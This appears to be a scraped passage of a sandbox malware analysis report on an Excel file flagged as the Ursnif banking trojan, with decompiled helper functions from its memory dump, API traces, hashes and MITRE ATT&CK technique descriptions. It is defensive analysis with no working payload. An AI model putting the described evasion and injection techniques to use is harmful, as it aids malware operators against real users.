Download Yara Rule

C-Code - Quality: 100%

			E00A17502(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00A1550F(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x00a17517
0x00a1751b
0x00a17525
0x00a1752c
0x00a1752f
0x00a17531
0x00a17539
0x00a1753e
0x00a1754c
0x00a17551
0x00a1755b

APIs

lstrlenW.KERNEL32(004F0053,74785520,?,00000008,0548931C,?,00A14BA1,004F0053,0548931C,?,?,?,?,?,?,00A19CB1), ref: 00A17512
lstrlenW.KERNEL32(00A14BA1,?,00A14BA1,004F0053,0548931C,?,?,?,?,?,?,00A19CB1), ref: 00A17519

Part of subcall function 00A1550F: RtlAllocateHeap.NTDLL(00000000,00000000,00A1863D), ref: 00A1551B

memcpy.NTDLL(00000000,004F0053,747869A0,?,?,00A14BA1,004F0053,0548931C,?,?,?,?,?,?,00A19CB1), ref: 00A17539
memcpy.NTDLL(747869A0,00A14BA1,00000002,00000000,004F0053,747869A0,?,?,00A14BA1,004F0053,0548931C), ref: 00A1754C

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 39fffe3dde67ffb050868cce38528c0469e33d66bae17300fad8d8ddc15d83e8
Instruction ID: 759e80e90a1fd06db2e5ece83f78d2b0e90b27dc1acaa3ce6d613748a4901cde
Opcode Fuzzy Hash: 39fffe3dde67ffb050868cce38528c0469e33d66bae17300fad8d8ddc15d83e8
Instruction Fuzzy Hash: E9F04F36900118BBCF10DFA9CC45CDE7BADEF093647054062FD08D7101E631EA54CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A19FA4, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00A13E46,00000000,00000000,00A13E46,0053002F,00000000), ref: 00A19FB0
lstrlen.KERNEL32(?), ref: 00A19FB8

Part of subcall function 00A1550F: RtlAllocateHeap.NTDLL(00000000,00000000,00A1863D), ref: 00A1551B

lstrcpy.KERNEL32(00000000,?), ref: 00A19FCF
lstrcat.KERNEL32(00000000,?), ref: 00A19FDA

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 8a6b59668d05ffe72a01957f6267b88e99cee6801bd69aa2f3a80baf32711fe7
Instruction ID: 3356ac680aef7f6509a85cc4499d323006b7e57f04c9dfa7a4784ab549076e0a
Opcode Fuzzy Hash: 8a6b59668d05ffe72a01957f6267b88e99cee6801bd69aa2f3a80baf32711fe7
Instruction Fuzzy Hash: 27E01233845621EBC712ABE49C08CCFBBAAEF887607058915F55493124C731D916CBD1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Attached_File_898318.xlsb

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Attached_File_898318.xlsb"

Indicators

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Function 00A17DD8, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 222
memoryfiletimeCOMMON

Function 6FC41000, Relevance: 24.1, APIs: 16, Instructions: 126
threadsleepsynchronizationCOMMON

Function 00A18B98, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102
memoryCOMMON

Function 6FC88303, Relevance: 13.8, APIs: 9, Instructions: 318
memoryCOMMON

Function 00A17925, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 6FC41C22, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 6FC41AD1, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 00A190BA, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 266
memorystringCOMMON

Function 00A19C23, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 149
timememoryCOMMON

Function 6FC41DBD, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81
filetimeCOMMON

Function 00A124C2, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 72
sleepmemorytimeCOMMON

Function 6FC4146A, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74
memorythreadCOMMON

Function 00A16D4A, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 6FC41792, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
librarystringloaderCOMMON

Function 00A1707F, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Function 00A16E28, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 6FC41314, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 00A14B22, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

Function 00A17790, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83
memoryCOMMON

Function 00A13F83, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57
memoryCOMMON

Function 6FC418B4, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Function 6FC4116E, Relevance: 6.1, APIs: 4, Instructions: 61
stringthreadCOMMON

Function 00A163EE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
memorytimeCOMMON

Function 6FC41CCA, Relevance: 4.6, APIs: 3, Instructions: 69
memoryCOMMON

Function 00A1A881, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Function 00A1974B, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON